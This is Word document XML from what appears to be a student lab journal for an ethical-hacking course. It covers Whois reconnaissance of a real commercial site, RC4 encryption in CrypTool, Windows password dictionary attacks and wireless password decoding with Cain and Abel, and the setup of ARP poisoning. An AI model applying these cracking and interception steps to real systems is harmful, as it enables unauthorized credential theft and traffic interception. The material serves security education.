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00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00A3347F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL  NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AIM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Google and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reconnaisasance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:spacing w:before="90"/>
        <w:ind w:left="3332" w:right="3507"/>
        <w:jc w:val="center"/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Using who.is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step1: Open the WHO.is website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120153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990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5935184" cy="3224403"/>
            <wp:effectExtent l="19050" t="0" r="8416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84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8"/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2: Enter the website name and hit the “Enter button”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  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120256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438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5903629" cy="216655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629" cy="2166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Default="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 3: Show you information about </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="00D4195F">
          <w:rPr>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.prestashop.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120358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30366" cy="481126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366" cy="481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5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12"/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90B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251204608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>974020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>124827</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5807488" cy="76783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88" cy="767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12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90B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pP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205632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>974020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5852735" cy="651729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35" cy="65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1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D03C4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noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2512066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05795" cy="566918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795" cy="566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6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D03C4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noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251207680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>969285</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>603367</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5884831" cy="56681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831" cy="566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4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A913FB" w:rsidRPr="00A3347F" w:rsidRDefault="00A3347F" w:rsidP="00A3347F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL  NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A913FB" w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00CD2C75">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)  Use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CryptTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to encrypt and decrypt passwords using RC4 algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6067425" cy="3362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pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using RC4.</w:t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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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Encryption using RC4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/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067425" cy="3438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A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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Decryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/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067425" cy="3371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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB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2.2</w:t>
      </w:r>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)  Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode wireless network passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F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025430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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75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Click  on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HASH </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Calcuator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Enter the password to convert into hash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876925" cy="3867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Paste the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>value  into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the field you have converted 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spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(MD5)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943475" cy="1085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Right Click on the hash and select the dictionary attack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Then  right</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> click on the file and select (Add to List) and then select the Wordlist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337300" cy="364680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Select all the options and start the dictionary attack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  <w:sectPr w:rsidR="00030BD3" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId24"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1300" w:left="1220" w:header="0" w:footer="88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D4195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124325" cy="3771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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00A3347F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="2880" w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL NO. 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="2925" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00C30C54" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">3.1) </w:t>
      </w:r>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t>TraceRoute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003D03C4" w:rsidRPr="00D4195F">
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D03C4" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step 1: Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> command and type </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidRPr="00D4195F">
          <w:rPr>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t xml:space="preserve">www.prestashop.com </w:t>
        </w:r>
        <w:r w:rsidRPr="00D4195F">
          <w:t>pr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D4195F">
        <w:t>ess “Enter”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2087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37</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5933483" cy="446913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83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D03C4" w:rsidP="006966BD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>: Ping all the IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2512097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31209" cy="583615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09" cy="583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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="605790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>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5467350" cy="424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D1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.2) Perform ARP Poisoning in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="220"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="449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pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Select sniffer on the top.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2520217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265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="451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D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221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3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Next to folder icon click on icon name start/stop sniffer. Select device and click on ok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20227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6032</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2916407" cy="3647884"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="453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407" cy="364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20"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>4 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
